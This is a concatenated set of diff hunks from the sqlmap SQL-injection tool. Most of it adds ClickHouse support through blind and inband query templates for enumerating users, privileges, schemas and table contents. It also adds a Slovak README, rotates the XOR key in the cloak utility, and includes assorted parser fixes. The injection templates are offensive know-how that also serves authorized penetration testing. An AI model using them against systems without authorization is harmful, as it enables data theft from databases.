        <blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' {LIMIT 1 OFFSET %d}" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
        <blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
    </tables>
    <columns>
        <!-- NOTE: COLUMNDATATYPE without CAST() causes problems during enumeration -->

@@ -975,11 +975,11 @@
    </columns>
    <dump_table>
        <inband query="SELECT %s FROM %s"/>
        <blind query="SELECT %s FROM %s {LIMIT 1 OFFSET %d}" count="SELECT COUNT(*) FROM %s"/>
        <blind query="SELECT %s FROM %s OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(*) FROM %s"/>
    </dump_table>
    <users>
        <inband query="SELECT USERNAME FROM SYS.SYSUSERS"/>
        <blind query="SELECT USERNAME FROM SYS.SYSUSERS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
        <blind query="SELECT USERNAME FROM SYS.SYSUSERS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
    </users>
    <!-- NOTE: No one can view the 'SYSUSERS'.'PASSWORD' column -->
    <passwords/>

@@ -1319,6 +1319,75 @@
        </search_column>
    </dbms>

    <dbms value="ClickHouse">
        <cast query="CAST(%s AS String)"/>
        <length query="length(%s)"/>
        <isnull query="ifNull(%s, '')"/>
        <delimiter query="||"/>
        <limit query="LIMIT %d OFFSET %d"/>
        <limitregexp query="\s+LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
        <limitgroupstart query="2"/>
        <limitgroupstop query="1"/>
        <limitstring query=" LIMIT "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--" query2="//"/>
        <substring query="substring(%s,%d,%d)"/>
        <concatenate query="%s||%s"/>
        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
        <inference query="substring((%s),%d,1)>'%c'" />
        <banner query="select version()"/>
        <current_user query="currentUser()"/>
        <current_db query="currentDatabase()"/>
        <hostname query="hostName()"/>
        <table_comment/>
        <column_comment/>
        <is_dba query="(SELECT access_type FROM system.grants WHERE user_name=currentUser())='ALL'"/>
        <check_udf/>
        <users>
            <inband query="SELECT name FROM system.users"/>
            <blind query="SELECT name FROM system.users LIMIT %d,1" count="SELECT COUNT(name) FROM system.users"/>
        </users>
        <passwords/>
        <privileges>
            <inband query="SELECT DISTINCT user_name,access_type FROM system.grants" condition="user_name"/>
            <blind query="SELECT DISTINCT(access_type) FROM system.grants WHERE user_name='%s' ORDER BY access_type LIMIT %d,1" count="SELECT COUNT(DISTINCT(access_type)) FROM system.grants WHERE user_name='%s'"/>
        </privileges>
        <roles>
            <inband query="SELECT DISTINCT user_name,role_name FROM system.role_grants" condition="user_name"/>
            <blind query="SELECT DISTINCT(role_name) FROM system.role_grants WHERE user_name='%s' ORDER BY role_name LIMIT %d,1" count="SELECT COUNT(DISTINCT(role_name)) FROM system.role_grants WHERE user_name='%s'"/>
        </roles>
        <statements/>
        <dbs>
            <inband query="SELECT schema_name FROM information_schema.schemata"/>
            <blind query="SELECT schema_name FROM information_schema.schemata ORDER BY schema_name LIMIT 1 OFFSET %d" count="SELECT COUNT(schema_name) FROM information_schema.schemata"/>
        </dbs>
        <tables>
            <inband query="SELECT table_schema,table_name FROM information_schema.tables" condition="table_schema"/>
            <blind query="SELECT table_name FROM information_schema.tables WHERE table_schema='%s' LIMIT 1 OFFSET %d" count="SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='%s'"/>
        </tables>
        <columns>
            <inband query="SELECT column_name,column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
            <blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s' LIMIT %d,1" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
            <blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT %d,1 " count="SELECT COUNT(*) FROM %s.%s"/>
        </dump_table>
        <search_table>
            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
        </search_table>
        <search_column>
            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
        </search_column>
        <search_db>
            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
            <blind query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count="SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
        </search_db>
    </dbms>

    <dbms value="CrateDB">
        <cast query="CAST(%s AS TEXT)"/>
        <length query="CHAR_LENGTH((%s)::text)"/>
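A hedged sketch of how the new ClickHouse `<inference>` template above, substring((%s),%d,1)>'%c', drives blind extraction: each request asks a single greater-than question about one character position, so a binary search over the printable range recovers the value one character at a time. The oracle() function here is a local simulation standing in for a real boolean-blind request, and SECRET is a made-up value; neither is sqlmap code.

```python
SECRET = "default"  # stands in for e.g. currentDatabase() on the target

def oracle(pos, char):
    # simulates the DBMS answering: substring((SELECT currentDatabase()), pos, 1) > 'char'
    return SECRET[pos - 1] > char

def extract_char(pos, low=32, high=126):
    # binary search over printable ASCII using only ">" answers
    while low < high:
        mid = (low + high) // 2
        if oracle(pos, chr(mid)):
            low = mid + 1
        else:
            high = mid
    return chr(low)

print("".join(extract_char(i + 1) for i in range(len(SECRET))))  # default
```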
@@ -1,3 +1,8 @@
# Version 1.7 (2023-01-02)

* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)

# Version 1.6 (2022-01-03)

* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
doc/translations/README-sk-SK.md (new file, 50 lines)

@@ -0,0 +1,50 @@
# sqlmap

[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)

sqlmap je open source nástroj na penetračné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekčným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetračného testera a širokou škálou prepínačov vrátane odtlačkov databázy, cez načítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operačnom systéme prostredníctvom mimopásmových pripojení.

Snímky obrazovky
----

Môžete navštíviť [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonštruuje niektoré funkcie na wiki.

Inštalácia
----

Najnovší tarball si môžete stiahnuť kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master).

Najlepšie je stiahnuť sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára:

    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.6**, **2.7** a **3.x** na akejkoľvek platforme.

Využitie
----

Na získanie zoznamu základných možností a prepínačov, použite:

    python sqlmap.py -h

Na získanie zoznamu všetkých možností a prepínačov, použite:

    python sqlmap.py -hh

Vzorku behu nájdete [tu](https://asciinema.org/a/46601).
Ak chcete získať prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis všetkých možností a prepínačov spolu s príkladmi, odporúčame vám nahliadnuť do [Používateľskej príručky](https://github.com/sqlmapproject/sqlmap/wiki/Usage).

Linky
----

* Domovská stránka: https://sqlmap.org
* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Sledovač problémov: https://github.com/sqlmapproject/sqlmap/issues
* Používateľská príručka: https://github.com/sqlmapproject/sqlmap/wiki
* Často kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
@@ -23,7 +23,7 @@ Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayar

    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.

Kullanım
----
@@ -21,7 +21,7 @@ if sys.version_info >= (3, 0):
    xrange = range
    ord = lambda _: _

KEY = b"ENWsCymUeJcXqSbD"
KEY = b"E6wRbVhD0IBeCiGJ"

def xor(message, key):
    return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
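A small usage sketch of the xor() helper in the cloak.py hunk above, using the new KEY value. It is Python 3 only and uses an identity shim in place of the module's own "ord = lambda _: _" trick; the sample payload bytes are made up.

```python
import struct

KEY = b"E6wRbVhD0IBeCiGJ"   # the new key from the hunk above
_ord = lambda _: _          # bytes indexing already yields ints on Python 3

def xor(message, key):
    # XOR every byte of the message with the repeating key
    return b"".join(struct.pack('B', _ord(message[i]) ^ _ord(key[i % len(key)])) for i in range(len(message)))

data = b"dummy payload"
print(xor(xor(data, KEY), KEY) == data)  # True: XOR-ing twice with the same key restores the input
```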
3 binary files not shown.
@@ -512,6 +512,23 @@ def start():
testSqlInj = True
paramKey = (conf.hostname, conf.path, place, parameter)

if kb.processUserMarks:
    if testSqlInj and place not in (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
        if kb.processNonCustom is None:
            message = "other non-custom parameters found. "
            message += "Do you want to process them too? [Y/n/q] "
            choice = readInput(message, default='Y').upper()

            if choice == 'Q':
                raise SqlmapUserQuitException
            else:
                kb.processNonCustom = choice == 'Y'

        if not kb.processNonCustom:
            infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
            logger.info(infoMsg)
            continue

if paramKey in kb.testedParams:
    testSqlInj = False
@@ -14,6 +14,7 @@ from lib.core.exception import SqlmapConnectionException
from lib.core.settings import ACCESS_ALIASES
from lib.core.settings import ALTIBASE_ALIASES
from lib.core.settings import CACHE_ALIASES
from lib.core.settings import CLICKHOUSE_ALIASES
from lib.core.settings import CRATEDB_ALIASES
from lib.core.settings import CUBRID_ALIASES
from lib.core.settings import DB2_ALIASES

@@ -46,6 +47,8 @@ from plugins.dbms.altibase.connector import Connector as AltibaseConn
from plugins.dbms.altibase import AltibaseMap
from plugins.dbms.cache.connector import Connector as CacheConn
from plugins.dbms.cache import CacheMap
from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn
from plugins.dbms.clickhouse import ClickHouseMap
from plugins.dbms.cratedb.connector import Connector as CrateDBConn
from plugins.dbms.cratedb import CrateDBMap
from plugins.dbms.cubrid.connector import Connector as CubridConn

@@ -122,6 +125,7 @@ def setHandler():
    (DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
    (DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
    (DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
    (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn),
    (DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
    (DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
    (DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),
@@ -222,7 +222,8 @@ class Agent(object):
def _(pattern, repl, string):
    retVal = string
    match = None
    for match in re.finditer(pattern, string):

    for match in re.finditer(pattern, string or ""):
        pass

    if match:

@@ -1027,8 +1028,8 @@
    limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1)
    limitedQuery += " %s" % limitStr

elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB):
    limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)
elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB, DBMS.CLICKHOUSE):
    limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
    limitedQuery += " %s" % limitStr

elif Backend.getIdentifiedDbms() in (DBMS.FRONTBASE, DBMS.VIRTUOSO):
@@ -1769,7 +1769,7 @@ def parseTargetUrl():
    errMsg = "invalid target URL port (%d)" % conf.port
    raise SqlmapSyntaxException(errMsg)

conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
conf.url = getUnicode("%s://%s%s%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, (":%d" % conf.port) if not (conf.port == 80 and conf.scheme == "http" or conf.port == 443 and conf.scheme == "https") else "", conf.path))
conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')

if urlSplit.query:

@@ -4940,6 +4940,12 @@ def decodeDbmsHexValue(value, raw=False):

    >>> decodeDbmsHexValue('3132332031') == u'123 1'
    True
    >>> decodeDbmsHexValue('31003200330020003100') == u'123 1'
    True
    >>> decodeDbmsHexValue('00310032003300200031') == u'123 1'
    True
    >>> decodeDbmsHexValue('0x31003200330020003100') == u'123 1'
    True
    >>> decodeDbmsHexValue('313233203') == u'123 ?'
    True
    >>> decodeDbmsHexValue(['0x31', '0x32']) == [u'1', u'2']

@@ -4978,6 +4984,9 @@
    if not isinstance(retVal, six.text_type):
        retVal = getUnicode(retVal, conf.encoding or UNICODE_ENCODING)

    if u"\x00" in retVal:
        retVal = retVal.replace(u"\x00", u"")

    return retVal

try:

@@ -5327,6 +5336,7 @@ def parseRequestFile(reqFile, checkParams=True):
    continue

getPostReq = False
forceBody = False
url = None
host = None
method = None

@@ -5347,7 +5357,7 @@
line = line.strip('\r')
match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None

if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
if len(line.strip()) == 0 and method and (method != HTTPMETHOD.GET or forceBody) and data is None:
    data = ""
    params = True

@@ -5384,16 +5394,18 @@
elif key.upper() == HTTP_HEADER.HOST.upper():
    if '://' in value:
        scheme, value = value.split('://')[:2]
    splitValue = value.split(":")
    host = splitValue[0]

    if len(splitValue) > 1:
        port = filterStringValue(splitValue[1], "[0-9]")
    port = extractRegexResult(r":(?P<result>\d+)\Z", value)
    if port:
        value = value[:-(1 + len(port))]

    host = value

# Avoid to add a static content length header to
# headers and consider the following lines as
# POSTed data
if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
    forceBody = True
    params = True

# Avoid proxy and connection type related headers
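A hedged, self-contained re-sketch of the idea behind the new decodeDbmsHexValue() doctests and the NUL-stripping branch above: when a DBMS returns hex that is really UTF-16 encoded text, every other byte is a NUL, so removing the NUL bytes after decoding recovers the expected string. The helper below is a simplified stand-in, not sqlmap's actual implementation (which goes through getBytes()/getUnicode()).

```python
import binascii

def decode_hex(value):
    # decode a hex dump coming back from the DBMS
    retVal = binascii.unhexlify(value).decode("utf8", "replace")
    # strip stray NUL bytes left over from UTF-16 style output
    if "\x00" in retVal:
        retVal = retVal.replace("\x00", "")
    return retVal

print(decode_hex("31003200330020003100"))  # 123 1
print(decode_hex("00310032003300200031"))  # 123 1
```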
@@ -38,6 +38,7 @@ from lib.core.settings import SQLITE_ALIASES
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import VERTICA_ALIASES
from lib.core.settings import VIRTUOSO_ALIASES
from lib.core.settings import CLICKHOUSE_ALIASES

FIREBIRD_TYPES = {
    261: "BLOB",

@@ -241,6 +242,7 @@ DBMS_DICT = {
    DBMS.PRESTO: (PRESTO_ALIASES, "presto-python-client", "https://github.com/prestodb/presto-python-client", None),
    DBMS.ALTIBASE: (ALTIBASE_ALIASES, None, None, None),
    DBMS.MIMERSQL: (MIMERSQL_ALIASES, "mimerpy", "https://github.com/mimersql/MimerPy", None),
    DBMS.CLICKHOUSE: (CLICKHOUSE_ALIASES, "clickhouse_connect", "https://github.com/ClickHouse/clickhouse-connect", None),
    DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"),
    DBMS.CUBRID: (CUBRID_ALIASES, "CUBRID-Python", "https://github.com/CUBRID/cubrid-python", None),
    DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype", None),

@@ -268,7 +270,7 @@ HEURISTIC_NULL_EVAL = {
    DBMS.ACCESS: "CVAR(NULL)",
    DBMS.MAXDB: "ALPHA(NULL)",
    DBMS.MSSQL: "DIFFERENCE(NULL,NULL)",
    DBMS.MYSQL: "QUARTER(NULL)",
    DBMS.MYSQL: "QUARTER(NULL XOR NULL)",
    DBMS.ORACLE: "INSTR2(NULL,NULL)",
    DBMS.PGSQL: "QUOTE_IDENT(NULL)",
    DBMS.SQLITE: "UNLIKELY(NULL)",

@@ -286,6 +288,7 @@
    DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))",
    DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))",
    DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)",
    DBMS.CLICKHOUSE: "halfMD5(NULL) IS NULL",
}

SQL_STATEMENTS = {
@@ -52,6 +52,7 @@ class DBMS(object):
    PRESTO = "Presto"
    ALTIBASE = "Altibase"
    MIMERSQL = "MimerSQL"
    CLICKHOUSE = "ClickHouse"
    CRATEDB = "CrateDB"
    CUBRID = "Cubrid"
    CACHE = "InterSystems Cache"

@@ -81,6 +82,7 @@ class DBMS_DIRECTORY_NAME(object):
    PRESTO = "presto"
    ALTIBASE = "altibase"
    MIMERSQL = "mimersql"
    CLICKHOUSE = "clickhouse"
    CRATEDB = "cratedb"
    CUBRID = "cubrid"
    CACHE = "cache"
@@ -815,7 +815,7 @@ def _setTamperingFunctions():
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__

for name, function in inspect.getmembers(module, inspect.isfunction):
    if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or hasattr(inspect, "getargspec") and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"):
    if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"):
        found = True
        kb.tamperFunctions.append(function)
        function.__name__ = module.__name__

@@ -2145,6 +2145,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.prependFlag = False
kb.processResponseCounter = 0
kb.previousMethod = None
kb.processNonCustom = None
kb.processUserMarks = None
kb.proxyAuthHeader = None
kb.queryCounter = 0
@@ -6,6 +6,8 @@ See the file 'LICENSE' for copying permission
"""

import codecs
import collections
import inspect
import os
import random
import re

@@ -93,6 +95,26 @@ def dirtyPatches():
    else:
        os.urandom = lambda size: "".join(chr(random.randint(0, 255)) for _ in xrange(size))

    # Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py
    # Reference: https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec
    if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"):
        ArgSpec = collections.namedtuple("ArgSpec", ("args", "varargs", "keywords", "defaults"))

        def makelist(data):
            if isinstance(data, (tuple, list, set, dict)):
                return list(data)
            elif data:
                return [data]
            else:
                return []

        def getargspec(func):
            spec = inspect.getfullargspec(func)
            kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs)
            return ArgSpec(kwargs, spec[1], spec[2], spec[3])

        inspect.getargspec = getargspec

def resolveCrossReferences():
    """
    Place for cross-reference resolution
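The patch.py hunk above backfills inspect.getargspec() on interpreters where it has been removed (it is gone in Python 3.11), so legacy checks such as the tamper-script signature test in lib/core/option.py keep working. Below is a standalone re-sketch of the same compatibility idea, not sqlmap's code verbatim; the getargspec_compat name is invented for illustration.

```python
import collections
import inspect

ArgSpec = collections.namedtuple("ArgSpec", ("args", "varargs", "keywords", "defaults"))

def getargspec_compat(func):
    # rebuild a getargspec-like result from getfullargspec (always available on Python 3)
    spec = inspect.getfullargspec(func)
    return ArgSpec(list(spec.args) + list(spec.kwonlyargs), spec.varargs, spec.varkw, spec.defaults)

def tamper(payload, **kwargs):
    return payload

spec = getargspec_compat(tamper)
print(spec.args, spec.keywords)  # ['payload'] kwargs
```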
@@ -20,7 +20,7 @@ from thirdparty import six
|
||||
from thirdparty.six import unichr as _unichr
|
||||
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.7.2.0"
|
||||
VERSION = "1.7.7.0"
|
||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||
@@ -283,6 +283,7 @@ PRESTO_SYSTEM_DBS = ("information_schema",)
|
||||
ALTIBASE_SYSTEM_DBS = ("SYSTEM_",)
|
||||
MIMERSQL_SYSTEM_DBS = ("information_schema", "SYSTEM",)
|
||||
CRATEDB_SYSTEM_DBS = ("information_schema", "pg_catalog", "sys")
|
||||
CLICKHOUSE_SYSTEM_DBS = ("information_schema", "INFORMATION_SCHEMA", "system")
|
CUBRID_SYSTEM_DBS = ("DBA",)
CACHE_SYSTEM_DBS = ("%Dictionary", "INFORMATION_SCHEMA", "%SYS")
EXTREMEDB_SYSTEM_DBS = ("",)
@@ -313,6 +314,7 @@ ALTIBASE_ALIASES = ("altibase",)
MIMERSQL_ALIASES = ("mimersql", "mimer")
CRATEDB_ALIASES = ("cratedb", "crate")
CUBRID_ALIASES = ("cubrid",)
CLICKHOUSE_ALIASES = ("clickhouse",)
CACHE_ALIASES = ("intersystems cache", "cachedb", "cache", "iris")
EXTREMEDB_ALIASES = ("extremedb", "extreme")
FRONTBASE_ALIASES = ("frontbase",)
@@ -321,10 +323,10 @@ VIRTUOSO_ALIASES = ("virtuoso", "openlink virtuoso")

DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))

SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES)
SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES)
SUPPORTED_OS = ("linux", "windows")

DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES))
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES))

USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
REFERER_ALIASES = ("ref", "referer", "referrer")
@@ -413,6 +415,7 @@ ERROR_PARSING_REGEXES = (
r"(?P<result>[^\n>]{0,100}SQL Syntax[^\n<]+)",
